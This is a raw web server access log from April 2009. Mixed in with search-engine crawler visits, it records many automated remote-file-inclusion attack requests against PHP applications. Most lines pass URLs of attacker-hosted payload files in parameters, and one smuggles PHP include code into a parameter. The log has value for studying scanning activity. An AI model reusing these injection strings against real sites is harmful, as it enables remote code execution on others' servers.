85.197.104.37 - - [10/Apr/2009:08:33:59 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/kito_barto/idxx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.249.71.203 - - [10/Apr/2009:08:36:24 -0500] "GET /silver_spanish_piece_of_eight.htm HTTP/1.1" 200 2427 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.135 - - [10/Apr/2009:08:39:08 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [10/Apr/2009:08:39:08 -0500] "GET /logs/access_log.1173744000 HTTP/1.1" 200 3422 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [10/Apr/2009:08:39:29 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.movie-net.tv/bbs/data/id.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
219.85.63.226 - - [10/Apr/2009:08:39:29 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.movie-net.tv/bbs/data/id.txt????? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
88.191.89.65 - - [10/Apr/2009:08:45:57 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:08:45:57 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:08:45:57 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:08:46:02 -0500] "GET /logs/access_log.1236470400//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.221.130.5 - - [10/Apr/2009:08:49:14 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.5 - - [10/Apr/2009:08:49:14 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.221.130.5 - - [10/Apr/2009:08:49:17 -0500] "GET /logs/access_log.1237248000//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
69.73.140.200 - - [10/Apr/2009:08:51:54 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
69.73.140.200 - - [10/Apr/2009:08:51:54 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
77.221.130.5 - - [10/Apr/2009:08:53:11 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.5 - - [10/Apr/2009:08:53:11 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.221.130.5 - - [10/Apr/2009:08:53:11 -0500] "GET /logs/access_log.1237248000//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://midnightcr3w.justfree.com/Fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.43.205.222 - - [10/Apr/2009:08:53:26 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.43.205.222 - - [10/Apr/2009:08:53:26 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.43.205.222 - - [10/Apr/2009:08:53:26 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.43.205.222 - - [10/Apr/2009:08:53:35 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.73.140.200 - - [10/Apr/2009:08:55:14 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
69.73.140.200 - - [10/Apr/2009:08:55:14 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
74.81.74.120 - - [10/Apr/2009:08:55:35 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.81.74.120 - - [10/Apr/2009:08:55:35 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.81.74.120 - - [10/Apr/2009:08:55:35 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.81.74.120 - - [10/Apr/2009:08:55:41 -0500] "GET /logs/access_log.1236470400//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.170.145.17 - - [10/Apr/2009:09:01:32 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.170.145.17 - - [10/Apr/2009:09:01:32 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.170.145.17 - - [10/Apr/2009:09:01:33 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.170.145.17 - - [10/Apr/2009:09:01:41 -0500] "GET /logs/access_log.1236470400//Neos_Chronos/header.php?base_folder=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.208.139 - - [10/Apr/2009:09:06:46 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [10/Apr/2009:09:06:46 -0500] "GET /logs/access_log.1185667200 HTTP/1.1" 200 1297 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
84.45.45.133 - - [10/Apr/2009:09:07:16 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.823"
84.45.45.133 - - [10/Apr/2009:09:07:16 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.823"
84.45.45.133 - - [10/Apr/2009:09:10:03 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.823"
84.45.45.133 - - [10/Apr/2009:09:10:03 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.823"
89.111.173.113 - - [10/Apr/2009:09:10:03 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://lindasartini.interfree.it/hk? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
89.111.173.113 - - [10/Apr/2009:09:10:03 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://lindasartini.interfree.it/hk? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
58.227.193.198 - - [10/Apr/2009:09:21:58 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:21:58 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:21:58 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:22:03 -0500] "GET /logs/access_log.1236470400//Neos_Chronos/header.php?base_folder=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.40.38.170 - - [10/Apr/2009:09:23:51 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.40.38.170 - - [10/Apr/2009:09:23:51 -0500] "GET /logs/access_log.1237075200/modules/My_eGallery/index.php?basepath=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.40.38.170 - - [10/Apr/2009:09:23:51 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 317 "-""Mozilla/5.0"
202.158.39.98 - - [10/Apr/2009:09:28:05 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
202.158.39.98 - - [10/Apr/2009:09:28:05 -0500] "GET /logs/access_log.1235174400//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
202.158.39.98 - - [10/Apr/2009:09:28:05 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.106.64.66 - - [10/Apr/2009:09:30:46 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.106.64.66 - - [10/Apr/2009:09:30:46 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
87.106.64.66 - - [10/Apr/2009:09:30:46 -0500] "GET /logs/access_log.1237075200/modules/My_eGallery/index.php?basepath=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:52 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:52 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:52 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:52 -0500] "GET /logs/access_log.1236988800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:52 -0500] "GET /logs/access_log.1234915200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:52 -0500] "GET /logs/access_log.1235433600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:52 -0500] "GET /logs/access_log.1236470400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:53 -0500] "GET /logs/access_log.1235779200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:53 -0500] "GET /logs/access_log.1237334400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:53 -0500] "GET /logs/access_log.1237248000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:58 -0500] "GET /logs/access_log.1235952000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:58 -0500] "GET /logs/access_log.1235174400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:58 -0500] "GET /logs/access_log.1236211200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:59 -0500] "GET /logs/access_log.1237161600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:59 -0500] "GET /logs/access_log.1236643200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:59 -0500] "GET /logs/access_log.1237075200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:32:59 -0500] "GET /logs/access_log.1235260800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:01 -0500] "GET /logs/access_log.1236556800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:06 -0500] "GET /logs/access_log.1237420800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:06 -0500] "GET /logs/access_log.1236384000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:07 -0500] "GET /logs/access_log.1235865600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:07 -0500] "GET /logs/access_log.1236902400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:23 -0500] "GET /logs/access_log.1235692800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:23 -0500] "GET /logs/access_log.1235520000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:24 -0500] "GET /logs/access_log.1236729600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:24 -0500] "GET /logs/access_log.1233705600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:24 -0500] "GET /logs/access_log.1236816000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:25 -0500] "GET /logs/access_log.1233792000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:25 -0500] "GET /logs/access_log.1235606400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:25 -0500] "GET /logs/access_log.1233273600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:30 -0500] "GET /logs/access_log.1232496000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:33:30 -0500] "GET /logs/access_log.1236297600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
209.90.77.43 - - [10/Apr/2009:09:34:19 -0500] "GET //index.php?themesdir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.90.77.43 - - [10/Apr/2009:09:34:19 -0500] "GET /logs//index.php?themesdir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.90.77.43 - - [10/Apr/2009:09:34:19 -0500] "GET /logs/access_log.1235260800//index.php?themesdir=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:35:01 -0500] "GET /logs/access_log.1236124800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
87.106.210.58 - - [10/Apr/2009:09:36:23 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.106.210.58 - - [10/Apr/2009:09:36:23 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.106.210.58 - - [10/Apr/2009:09:36:23 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:38:13 -0500] "GET /?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:38:13 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:38:14 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
58.227.193.198 - - [10/Apr/2009:09:38:26 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:09:38:45 -0500] "GET /?DOCUMENT_ROOT=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:09:38:49 -0500] "GET /?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:09:38:49 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:09:38:49 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.89.65 - - [10/Apr/2009:09:38:50 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:09:39:08 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:09:39:08 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.137.192.223 - - [10/Apr/2009:09:39:09 -0500] "GET /logs/?DOCUMENT_ROOT=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:09:40:50 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:09:40:51 -0500] "GET /?DOCUMENT_ROOT=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:09:40:52 -0500] "GET /logs/?DOCUMENT_ROOT=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
125.251.161.165 - - [10/Apr/2009:09:41:06 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://forum-plongee.com/icon/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.81.74.120 - - [10/Apr/2009:09:41:34 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.81.74.120 - - [10/Apr/2009:09:41:34 -0500] "GET /?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
74.81.74.120 - - [10/Apr/2009:09:41:35 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 184992 "-""Mozilla/5.0"
74.81.74.120 - - [10/Apr/2009:09:41:53 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:42:04 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:42:04 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:42:04 -0500] "GET /logs/access_log.1234828800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
88.191.25.42 - - [10/Apr/2009:09:42:18 -0500] "GET /logs/access_log.1234915200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://islamicdesigns.askmuslims.com/FX29ID1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
60.251.60.100 - - [10/Apr/2009:09:42:46 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.peacemovers.com/media/includes/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.69"
58.227.193.198 - - [10/Apr/2009:09:43:44 -0500] "GET /?DOCUMENT_ROOT=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
